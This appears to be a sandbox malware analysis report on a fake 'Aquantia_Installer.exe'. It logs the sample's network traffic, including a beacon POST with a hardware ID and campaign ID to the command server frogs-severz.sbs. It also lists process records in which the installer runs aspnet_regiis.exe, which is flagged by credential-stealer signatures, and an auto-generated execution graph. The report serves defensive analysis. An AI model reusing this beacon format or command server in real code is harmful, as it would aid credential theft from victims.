                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: a6 5e fc 5c 71 0c 76 15 5b f7 93 64 ec c5 8c 7e a8 b5 1d 7d 1a 17 ad 2f 7f 2c 9e 22 2d c4 05 88 cc 19 fe a8 d1 cf 66 ef b5 9c b4 4b 5b f6 e0 c0 b9 9d 57 74 cf 19 3b 94 7f db 69 58 3d 70 ed 8a fe b8 14 ae d7 65 bd 66 50 2e a4 93 eb 6c ec 32 a3 3e 34 63 fb f2 d6 79 c2 d3 a1 af 0b 15 2b fb a4 fe d5 8a 77 1e a7 8c 94 6c 84 e9 1b 6d 17 c6 13 77 09 7d bd a6 61 7f 55 b1 02 f4 3d 36 af 7d a8 92 7a 4b 01 47 04 38 cc b6 c3 81 61 5a 3c c3 43 a8 7f b8 b9 3e 43 b4 56 f9 82 2d c0 a0 47 35 3a 47 4e a8 76 21 ca 1e d0 ff fb bc 37 a1 68 f2 10 01 33 fc 28 04 5d b6 57 f9 1a 50 94 bb 22 7e e1 87 df 58 e9 f0 74 fc 23 d8 74 65 e4 53 f3 be 10 63 31 9c f9 9e 02 0f c2 3a 67 e7 b8 21 0e d5 1e 69 48 27 cf c4 59 3c b5 51 5d fc 41 2e 3e d8 08 e5 95 64 16 76 c8 1c 3a 40 89 ae 1c 4d e6
                                                                      Data Ascii: ^\qv[d~}/,"-fK[Wt;iX=pefP.l2>4cy+wlmw}aU=6}zKG8aZ<C>CV-G5:GNv!7h3(]WP"~Xt#teSc1:g!iH'Y<Q]A.>dv:@M
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: 19 8a 2b 71 53 12 97 cc b1 0b ac bf c4 53 27 95 56 4a bb 5c e5 88 4f 1b 6a 65 c1 99 45 a1 b4 f8 6c d6 2d 84 57 b3 43 ae 6f 35 b7 93 8d e2 68 a8 68 d9 28 82 0b 9c 80 d4 d8 d9 c6 9b 51 9c 58 49 ad 44 c8 81 d7 b3 29 c9 66 49 88 2d 22 fd 5e 71 70 78 4b c8 a1 5f db ae 54 c5 70 2a 71 05 81 86 f8 f3 31 1e ed 51 25 a2 7f 9f 67 6b cc 8f bb 1e 7e f6 81 3a 8a de 98 b4 30 79 88 23 37 58 a4 9f 24 87 3b 2a d1 e4 b8 7e 5f 2a f9 05 4f 4e 0e c1 ce e7 17 73 59 3e 39 c5 08 32 dd 94 6e 38 80 38 06 12 ae ea ac 17 6b c6 16 92 c4 51 7a 22 6d 79 c5 9f ac e2 fa 56 9f 3c 5e 6b f9 9f 54 fb 8a c6 60 89 1f 05 1d 59 a6 1a 52 03 c1 6e d5 fc f9 b9 2e cf f5 2f eb 1f d6 66 d6 c4 40 cf fe 88 92 57 c2 75 c4 43 c0 8d 92 c8 78 31 f6 85 d9 a4 97 d7 45 d9 17 e6 b6 6a 01 6f d1 de df da 5e 18 c3
                                                                      Data Ascii: +qSS'VJ\OjeEl-WCo5hh(QXID)fI-"^qpxK_Tp*q1Q%gk~:0y#7X$;*~_*ONsY>92n88kQz"myV<^kT`YRn./f@WuCx1Ejo^
                                                                      2024-11-23 14:22:13 UTC1017INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:22:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ebkcetb9ihkgn97aeti0fagabm; expires=Wed, 19-Mar-2025 08:08:51 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5NQWtVlUedUUOJkdR3OSdJWIUF4hBPilKV%2FIjY%2BLj4uiWDypp%2Bk9hM6o5Q%2BRSnxwm5RtZRgmewds9WR1U1vUiUESFUDzf683L08aULHODOO1jfZkcCodFDOzsaGrZ7G3USR"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf55acfb4364-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=341&recv=591&lost=0&retrans=0&sent_bytes=2839&recv_bytes=592181&delivery_rate=1693735&cwnd=206&unsent_bytes=0&cid=c95b2976f8be5a08&ts=2623&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.549722172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:22:14 UTC264OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 89
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:22:14 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 26 6a 3d 26 68 77 69 64 3d 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44
                                                                      Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--jqmircmzqpgf&j=&hwid=BDFA7B391BE94DD4BE8895FDBE41969D
                                                                      2024-11-23 14:22:15 UTC1007INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:22:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=mvrub0am6g16r76jgclkpemh37; expires=Wed, 19-Mar-2025 08:08:54 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SOKR303pfKU1fgXNHnlKgr8aliIQtsAnkwMN77qo2AT0eI5aME42SEt4PfrGCyCYsDu1uPDz3D%2BQniVZ%2B%2FOCQdngtdzVUZxVU1mOfvZPyVaQIlFEhTQE8o41PBDqCRAX3DJS"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf6f081a32ee-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1998&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=989&delivery_rate=1431372&cwnd=242&unsent_bytes=0&cid=da4b84b1c604a717&ts=744&x=0"
                                                                      2024-11-23 14:22:15 UTC54INData Raw: 33 30 0d 0a 45 4f 39 6c 63 35 76 75 4b 44 73 37 33 66 74 2f 54 6e 32 48 47 51 64 4e 50 4c 44 56 69 54 59 37 70 32 45 41 74 71 45 45 4d 53 56 4c 73 67 3d 3d 0d 0a
                                                                      Data Ascii: 30EO9lc5vuKDs73ft/Tn2HGQdNPLDViTY7p2EAtqEEMSVLsg==
                                                                      2024-11-23 14:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:09:21:52
                                                                      Start date:23/11/2024
                                                                      Path:C:\Users\user\Desktop\Aquantia_Installer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Aquantia_Installer.exe"
                                                                      Imagebase:0xfe0000
                                                                      File size:701'952 bytes
                                                                      MD5 hash:A19287453762B8BED2B6A7CE68C413CA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:09:21:52
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:21:53
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                      Imagebase:0x8c0000
                                                                      File size:43'016 bytes
                                                                      MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2136115217.000000000313E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2136092641.0000000003136000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:09:21:53
                                                                      Start date:23/11/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224
                                                                      Imagebase:0xb90000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:14%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:8%
                                                                        Total number of Nodes:1520
                                                                        Total number of Limit Nodes:12
                                                                        execution_graph 11293 6cf34032 11294 6cf3403e ___scrt_is_nonwritable_in_current_image 11293->11294 11305 6cf3223b EnterCriticalSection 11294->11305 11296 6cf34045 11297 6cf35b71 26 API calls 11296->11297 11298 6cf34054 11297->11298 11304 6cf34063 11298->11304 11306 6cf33ec8 GetStartupInfoW 11298->11306 11303 6cf33f7e 2 API calls 11303->11304 11312 6cf34089 11304->11312 11305->11296 11307 6cf33ee5 11306->11307 11308 6cf33f79 11306->11308 11307->11308 11309 6cf35b71 26 API calls 11307->11309 11308->11303 11311 6cf33f0d 11309->11311 11310 6cf33f3d GetFileType 11310->11311 11311->11308 11311->11310 11315 6cf32283 LeaveCriticalSection 11312->11315 11314 6cf34074 11315->11314 11699 6cf37331 11700 6cf37355 11699->11700 11701 6cf373a6 11700->11701 11703 6cf37431 __startOneArgErrorHandling 11700->11703 11702 6cf38043 15 API calls 11701->11702 11704 6cf373b8 11701->11704 11702->11704 11705 6cf38675 20 API calls 11703->11705 11706 6cf38279 __startOneArgErrorHandling 11703->11706 11705->11706 11489 6cf34fb0 11490 6cf34fea 11489->11490 11491 6cf32534 _free 14 API calls 11490->11491 11496 6cf34ffe 11490->11496 11492 6cf34ff3 11491->11492 11493 6cf32477 __fassign 25 API calls 11492->11493 11493->11496 11494 6cf2f0f0 _ValidateLocalCookies 5 API calls 11495 6cf3500b 11494->11495 11496->11494 11186 6cf33e77 11187 6cf33ea8 11186->11187 11189 6cf33e82 11186->11189 11188 6cf33e92 FreeLibrary 11188->11189 11189->11187 11189->11188 11316 6cf38237 11317 6cf38250 __startOneArgErrorHandling 11316->11317 11319 6cf38279 __startOneArgErrorHandling 11317->11319 11320 6cf38675 11317->11320 11321 6cf386ae __startOneArgErrorHandling 11320->11321 11322 6cf38951 __raise_exc RaiseException 11321->11322 11323 6cf386d5 __startOneArgErrorHandling 11321->11323 11322->11323 11324 6cf38718 11323->11324 11325 6cf386f3 11323->11325 11326 6cf38c47 __startOneArgErrorHandling 14 API calls 11324->11326 11331 6cf38c76 11325->11331 11328 6cf38713 __startOneArgErrorHandling 11326->11328 11329 6cf2f0f0 _ValidateLocalCookies 5 API calls 11328->11329 11330 6cf3873c 11329->11330 11330->11319 11332 6cf38c85 11331->11332 11333 6cf38cf9 __startOneArgErrorHandling 11332->11333 11334 6cf38ca4 __startOneArgErrorHandling 11332->11334 11335 6cf38c47 __startOneArgErrorHandling 14 API calls 11333->11335 11337 6cf38cf2 11334->11337 11338 6cf38c47 __startOneArgErrorHandling 14 API calls 11334->11338 11336 6cf38d0e 11335->11336 11336->11328 11337->11328 11338->11337 11707 6cf2f737 11708 6cf2f73f ___scrt_release_startup_lock 11707->11708 11711 6cf30daf 11708->11711 11710 6cf2f767 11712 6cf30dc2 11711->11712 11713 6cf30dbe 11711->11713 11716 6cf30dcf 11712->11716 11713->11710 11717 6cf320ff _free 14 API calls 11716->11717 11718 6cf30dcb 11717->11718 11718->11710 11190 6cf30675 11193 6cf306c3 11190->11193 11194 6cf30680 11193->11194 11195 6cf306cc 11193->11195 11195->11194 11202 6cf30909 11195->11202 11198 6cf30909 47 API calls 11199 6cf30712 11198->11199 11216 6cf319d8 11199->11216 11203 6cf30917 23 API calls 11202->11203 11204 6cf3090e 11203->11204 11205 6cf30707 11204->11205 11206 6cf342bd __fassign 2 API calls 11204->11206 11205->11198 11207 6cf31a8e 11206->11207 11208 6cf31a99 11207->11208 11209 6cf34302 __fassign 37 API calls 11207->11209 11210 6cf31aa3 IsProcessorFeaturePresent 11208->11210 11211 6cf31ac2 11208->11211 11209->11208 11213 6cf31aaf 11210->11213 11212 6cf311bb __fassign 23 API calls 11211->11212 11214 6cf31acc 11212->11214 11215 6cf322cb __fassign 8 API calls 11213->11215 11215->11211 11217 6cf319e4 ___scrt_is_nonwritable_in_current_image 11216->11217 11218 6cf31fa8 __fassign 37 API calls 11217->11218 11221 6cf319e9 11218->11221 11219 6cf31a89 __fassign 37 API calls 11220 6cf31a13 11219->11220 11221->11219 11719 6cf37f35 11721 6cf37f5d 11719->11721 11720 6cf37f95 11721->11720 11722 6cf37f87 11721->11722 11723 6cf37f8e 11721->11723 11724 6cf38007 20 API calls 11722->11724 11728 6cf37ff0 11723->11728 11726 6cf37f8c 11724->11726 11729 6cf38010 11728->11729 11730 6cf38523 __startOneArgErrorHandling 20 API calls 11729->11730 11731 6cf37f93 11730->11731 10986 6cf318b4 10987 6cf305f6 ___scrt_uninitialize_crt 7 API calls 10986->10987 10988 6cf318bb 10987->10988 11497 6cf321b4 11505 6cf33c74 11497->11505 11500 6cf321c8 11501 6cf320ff _free 14 API calls 11502 6cf321d0 11501->11502 11503 6cf321dd 11502->11503 11504 6cf321e0 __DllMainCRTStartup@12 6 API calls 11502->11504 11504->11500 11506 6cf33b92 _free 5 API calls 11505->11506 11507 6cf33c90 11506->11507 11508 6cf33ca8 TlsAlloc 11507->11508 11509 6cf321be 11507->11509 11508->11509 11509->11500 11509->11501 11357 6cf321fa 11359 6cf32205 11357->11359 11358 6cf33d73 6 API calls 11358->11359 11359->11358 11360 6cf3222e 11359->11360 11361 6cf3222a 11359->11361 11363 6cf32252 11360->11363 11364 6cf3227e 11363->11364 11365 6cf3225f 11363->11365 11364->11361 11366 6cf32269 DeleteCriticalSection 11365->11366 11366->11364 11366->11366 9775 6cf320ff GetLastError 9776 6cf3211c 9775->9776 9777 6cf32116 9775->9777 9795 6cf32122 SetLastError 9776->9795 9798 6cf33d31 9776->9798 9810 6cf33cf2 9777->9810 9784 6cf32152 9787 6cf33d31 _free 6 API calls 9784->9787 9785 6cf32169 9786 6cf33d31 _free 6 API calls 9785->9786 9788 6cf32175 9786->9788 9791 6cf32160 9787->9791 9789 6cf3218a 9788->9789 9790 6cf32179 9788->9790 9821 6cf31da9 9789->9821 9793 6cf33d31 _free 6 API calls 9790->9793 9815 6cf325a4 9791->9815 9793->9791 9797 6cf325a4 _free 12 API calls 9797->9795 9826 6cf33b92 9798->9826 9801 6cf3213a 9801->9795 9803 6cf32547 9801->9803 9802 6cf33d6b TlsSetValue 9808 6cf32554 _free 9803->9808 9804 6cf32594 9843 6cf32534 9804->9843 9805 6cf3257f RtlAllocateHeap 9806 6cf3214a 9805->9806 9805->9808 9806->9784 9806->9785 9808->9804 9808->9805 9840 6cf34166 9808->9840 9811 6cf33b92 _free 5 API calls 9810->9811 9812 6cf33d0e 9811->9812 9813 6cf33d17 9812->9813 9814 6cf33d29 TlsGetValue 9812->9814 9813->9776 9816 6cf325af HeapFree 9815->9816 9817 6cf325d8 _free 9815->9817 9816->9817 9818 6cf325c4 9816->9818 9817->9795 9819 6cf32534 _free 12 API calls 9818->9819 9820 6cf325ca GetLastError 9819->9820 9820->9817 9880 6cf31c3d 9821->9880 9827 6cf33bc0 9826->9827 9828 6cf33bbc 9826->9828 9827->9828 9833 6cf33acb 9827->9833 9828->9801 9828->9802 9831 6cf33bda GetProcAddress 9831->9828 9832 6cf33bea _free 9831->9832 9832->9828 9838 6cf33adc ___vcrt_FlsSetValue 9833->9838 9834 6cf33afa LoadLibraryExW 9835 6cf33b15 GetLastError 9834->9835 9834->9838 9835->9838 9836 6cf33b70 FreeLibrary 9836->9838 9837 6cf33b87 9837->9828 9837->9831 9838->9834 9838->9836 9838->9837 9839 6cf33b48 LoadLibraryExW 9838->9839 9839->9838 9846 6cf34193 9840->9846 9857 6cf320ff GetLastError 9843->9857 9845 6cf32539 9845->9806 9847 6cf3419f ___scrt_is_nonwritable_in_current_image 9846->9847 9852 6cf3223b EnterCriticalSection 9847->9852 9849 6cf341aa 9853 6cf341e6 9849->9853 9852->9849 9856 6cf32283 LeaveCriticalSection 9853->9856 9855 6cf34171 9855->9808 9856->9855 9858 6cf3211c 9857->9858 9859 6cf32116 9857->9859 9861 6cf33d31 _free 6 API calls 9858->9861 9877 6cf32122 SetLastError 9858->9877 9860 6cf33cf2 _free 6 API calls 9859->9860 9860->9858 9862 6cf3213a 9861->9862 9863 6cf32547 _free 12 API calls 9862->9863 9862->9877 9865 6cf3214a 9863->9865 9866 6cf32152 9865->9866 9867 6cf32169 9865->9867 9869 6cf33d31 _free 6 API calls 9866->9869 9868 6cf33d31 _free 6 API calls 9867->9868 9870 6cf32175 9868->9870 9873 6cf32160 9869->9873 9871 6cf3218a 9870->9871 9872 6cf32179 9870->9872 9876 6cf31da9 _free 12 API calls 9871->9876 9875 6cf33d31 _free 6 API calls 9872->9875 9874 6cf325a4 _free 12 API calls 9873->9874 9874->9877 9875->9873 9878 6cf32195 9876->9878 9877->9845 9879 6cf325a4 _free 12 API calls 9878->9879 9879->9877 9881 6cf31c49 ___scrt_is_nonwritable_in_current_image 9880->9881 9894 6cf3223b EnterCriticalSection 9881->9894 9883 6cf31c53 9895 6cf31c83 9883->9895 9886 6cf31d4f 9887 6cf31d5b ___scrt_is_nonwritable_in_current_image 9886->9887 9899 6cf3223b EnterCriticalSection 9887->9899 9889 6cf31d65 9900 6cf31f30 9889->9900 9891 6cf31d7d 9904 6cf31d9d 9891->9904 9894->9883 9898 6cf32283 LeaveCriticalSection 9895->9898 9897 6cf31c71 9897->9886 9898->9897 9899->9889 9901 6cf31f3f _free 9900->9901 9903 6cf31f66 _free 9900->9903 9901->9903 9907 6cf34c89 9901->9907 9903->9891 10021 6cf32283 LeaveCriticalSection 9904->10021 9906 6cf31d8b 9906->9797 9909 6cf34d09 9907->9909 9910 6cf34c9f 9907->9910 9911 6cf325a4 _free 14 API calls 9909->9911 9933 6cf34d57 9909->9933 9910->9909 9915 6cf325a4 _free 14 API calls 9910->9915 9916 6cf34cd2 9910->9916 9912 6cf34d2b 9911->9912 9913 6cf325a4 _free 14 API calls 9912->9913 9917 6cf34d3e 9913->9917 9914 6cf325a4 _free 14 API calls 9918 6cf34cfe 9914->9918 9920 6cf34cc7 9915->9920 9921 6cf325a4 _free 14 API calls 9916->9921 9932 6cf34cf4 9916->9932 9922 6cf325a4 _free 14 API calls 9917->9922 9923 6cf325a4 _free 14 API calls 9918->9923 9919 6cf34dc5 9924 6cf325a4 _free 14 API calls 9919->9924 9935 6cf36bb7 9920->9935 9926 6cf34ce9 9921->9926 9927 6cf34d4c 9922->9927 9923->9909 9929 6cf34dcb 9924->9929 9963 6cf36cb5 9926->9963 9931 6cf325a4 _free 14 API calls 9927->9931 9928 6cf325a4 14 API calls _free 9934 6cf34d65 9928->9934 9929->9903 9931->9933 9932->9914 9975 6cf34dfa 9933->9975 9934->9919 9934->9928 9936 6cf36bc8 9935->9936 9962 6cf36cb1 9935->9962 9937 6cf36bd9 9936->9937 9939 6cf325a4 _free 14 API calls 9936->9939 9938 6cf36beb 9937->9938 9940 6cf325a4 _free 14 API calls 9937->9940 9941 6cf36bfd 9938->9941 9942 6cf325a4 _free 14 API calls 9938->9942 9939->9937 9940->9938 9943 6cf36c0f 9941->9943 9944 6cf325a4 _free 14 API calls 9941->9944 9942->9941 9945 6cf36c21 9943->9945 9947 6cf325a4 _free 14 API calls 9943->9947 9944->9943 9946 6cf36c33 9945->9946 9948 6cf325a4 _free 14 API calls 9945->9948 9949 6cf36c45 9946->9949 9950 6cf325a4 _free 14 API calls 9946->9950 9947->9945 9948->9946 9951 6cf36c57 9949->9951 9952 6cf325a4 _free 14 API calls 9949->9952 9950->9949 9953 6cf36c69 9951->9953 9955 6cf325a4 _free 14 API calls 9951->9955 9952->9951 9954 6cf36c7b 9953->9954 9956 6cf325a4 _free 14 API calls 9953->9956 9957 6cf36c8d 9954->9957 9958 6cf325a4 _free 14 API calls 9954->9958 9955->9953 9956->9954 9959 6cf325a4 _free 14 API calls 9957->9959 9960 6cf36c9f 9957->9960 9958->9957 9959->9960 9961 6cf325a4 _free 14 API calls 9960->9961 9960->9962 9961->9962 9962->9916 9964 6cf36cc2 9963->9964 9974 6cf36d1a 9963->9974 9965 6cf325a4 _free 14 API calls 9964->9965 9966 6cf36cd2 9964->9966 9965->9966 9967 6cf325a4 _free 14 API calls 9966->9967 9968 6cf36ce4 9966->9968 9967->9968 9969 6cf36cf6 9968->9969 9971 6cf325a4 _free 14 API calls 9968->9971 9970 6cf36d08 9969->9970 9972 6cf325a4 _free 14 API calls 9969->9972 9973 6cf325a4 _free 14 API calls 9970->9973 9970->9974 9971->9969 9972->9970 9973->9974 9974->9932 9976 6cf34e07 9975->9976 9977 6cf34e26 9975->9977 9976->9977 9981 6cf36d56 9976->9981 9977->9934 9980 6cf325a4 _free 14 API calls 9980->9977 9982 6cf34e20 9981->9982 9983 6cf36d67 9981->9983 9982->9980 10017 6cf36d1e 9983->10017 9986 6cf36d1e _free 14 API calls 9987 6cf36d7a 9986->9987 9988 6cf36d1e _free 14 API calls 9987->9988 9989 6cf36d85 9988->9989 9990 6cf36d1e _free 14 API calls 9989->9990 9991 6cf36d90 9990->9991 9992 6cf36d1e _free 14 API calls 9991->9992 9993 6cf36d9e 9992->9993 9994 6cf325a4 _free 14 API calls 9993->9994 9995 6cf36da9 9994->9995 9996 6cf325a4 _free 14 API calls 9995->9996 9997 6cf36db4 9996->9997 9998 6cf325a4 _free 14 API calls 9997->9998 9999 6cf36dbf 9998->9999 10000 6cf36d1e _free 14 API calls 9999->10000 10001 6cf36dcd 10000->10001 10002 6cf36d1e _free 14 API calls 10001->10002 10003 6cf36ddb 10002->10003 10004 6cf36d1e _free 14 API calls 10003->10004 10005 6cf36dec 10004->10005 10006 6cf36d1e _free 14 API calls 10005->10006 10007 6cf36dfa 10006->10007 10008 6cf36d1e _free 14 API calls 10007->10008 10009 6cf36e08 10008->10009 10010 6cf325a4 _free 14 API calls 10009->10010 10011 6cf36e13 10010->10011 10012 6cf325a4 _free 14 API calls 10011->10012 10013 6cf36e1e 10012->10013 10014 6cf325a4 _free 14 API calls 10013->10014 10015 6cf36e29 10014->10015 10016 6cf325a4 _free 14 API calls 10015->10016 10016->9982 10018 6cf36d51 10017->10018 10020 6cf36d41 10017->10020 10018->9986 10019 6cf325a4 _free 14 API calls 10019->10020 10020->10018 10020->10019 10021->9906 10022 6cf2f0fe 10023 6cf2f109 10022->10023 10024 6cf2f13c 10022->10024 10025 6cf2f12e 10023->10025 10026 6cf2f10e 10023->10026 10061 6cf2f258 10024->10061 10034 6cf2f151 10025->10034 10028 6cf2f113 10026->10028 10029 6cf2f124 10026->10029 10033 6cf2f118 10028->10033 10048 6cf2f72a 10028->10048 10053 6cf2f70b 10029->10053 10035 6cf2f15d ___scrt_is_nonwritable_in_current_image 10034->10035 10088 6cf2f79b 10035->10088 10037 6cf2f164 __DllMainCRTStartup@12 10038 6cf2f250 10037->10038 10039 6cf2f18b 10037->10039 10045 6cf2f1c7 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10037->10045 10107 6cf2f93a IsProcessorFeaturePresent 10038->10107 10099 6cf2f6fd 10039->10099 10042 6cf2f257 10043 6cf2f19a __RTC_Initialize 10043->10045 10102 6cf2f61b InitializeSListHead 10043->10102 10045->10033 10046 6cf2f1a8 10046->10045 10103 6cf2f6d2 10046->10103 10201 6cf3198e 10048->10201 10293 6cf305e0 10053->10293 10058 6cf2f727 10058->10033 10059 6cf305eb 21 API calls 10060 6cf2f714 10059->10060 10060->10033 10063 6cf2f264 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10061->10063 10062 6cf2f26d 10062->10033 10063->10062 10064 6cf2f300 10063->10064 10065 6cf2f295 10063->10065 10067 6cf2f93a __DllMainCRTStartup@12 4 API calls 10064->10067 10313 6cf2f76b 10065->10313 10070 6cf2f307 ___scrt_is_nonwritable_in_current_image 10067->10070 10068 6cf2f29a 10322 6cf2f627 10068->10322 10071 6cf2f323 10070->10071 10072 6cf2f33d dllmain_raw 10070->10072 10074 6cf2f338 10070->10074 10071->10033 10072->10071 10075 6cf2f357 dllmain_crt_dispatch 10072->10075 10073 6cf2f29f __RTC_Initialize __DllMainCRTStartup@12 10325 6cf2f90c 10073->10325 10334 6cf2e200 10074->10334 10075->10071 10075->10074 10080 6cf2f3b2 dllmain_crt_dispatch 10080->10071 10083 6cf2f3c5 dllmain_raw 10080->10083 10081 6cf2f3a9 10081->10071 10081->10080 10083->10071 10084 6cf2e200 __DllMainCRTStartup@12 5 API calls 10085 6cf2f390 10084->10085 10086 6cf2f258 __DllMainCRTStartup@12 79 API calls 10085->10086 10087 6cf2f39e dllmain_raw 10086->10087 10087->10081 10089 6cf2f7a4 10088->10089 10111 6cf2fb08 IsProcessorFeaturePresent 10089->10111 10093 6cf2f7b5 10094 6cf2f7b9 10093->10094 10121 6cf31971 10093->10121 10094->10037 10097 6cf2f7d0 10097->10037 10195 6cf2f7d4 10099->10195 10101 6cf2f704 10101->10043 10102->10046 10104 6cf2f6d7 ___scrt_release_startup_lock 10103->10104 10105 6cf2fb08 IsProcessorFeaturePresent 10104->10105 10106 6cf2f6e0 10104->10106 10105->10106 10106->10045 10108 6cf2f950 __DllMainCRTStartup@12 10107->10108 10109 6cf2f9fb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10108->10109 10110 6cf2fa46 __DllMainCRTStartup@12 10109->10110 10110->10042 10112 6cf2f7b0 10111->10112 10113 6cf305c1 10112->10113 10130 6cf309f7 10113->10130 10117 6cf305d2 10118 6cf305dd 10117->10118 10144 6cf30a33 10117->10144 10118->10093 10120 6cf305ca 10120->10093 10186 6cf340be 10121->10186 10124 6cf305f6 10125 6cf30609 10124->10125 10126 6cf305ff 10124->10126 10125->10094 10127 6cf309dc ___vcrt_uninitialize_ptd 6 API calls 10126->10127 10128 6cf30604 10127->10128 10129 6cf30a33 ___vcrt_uninitialize_locks DeleteCriticalSection 10128->10129 10129->10125 10131 6cf30a00 10130->10131 10133 6cf30a29 10131->10133 10134 6cf305c6 10131->10134 10148 6cf30c65 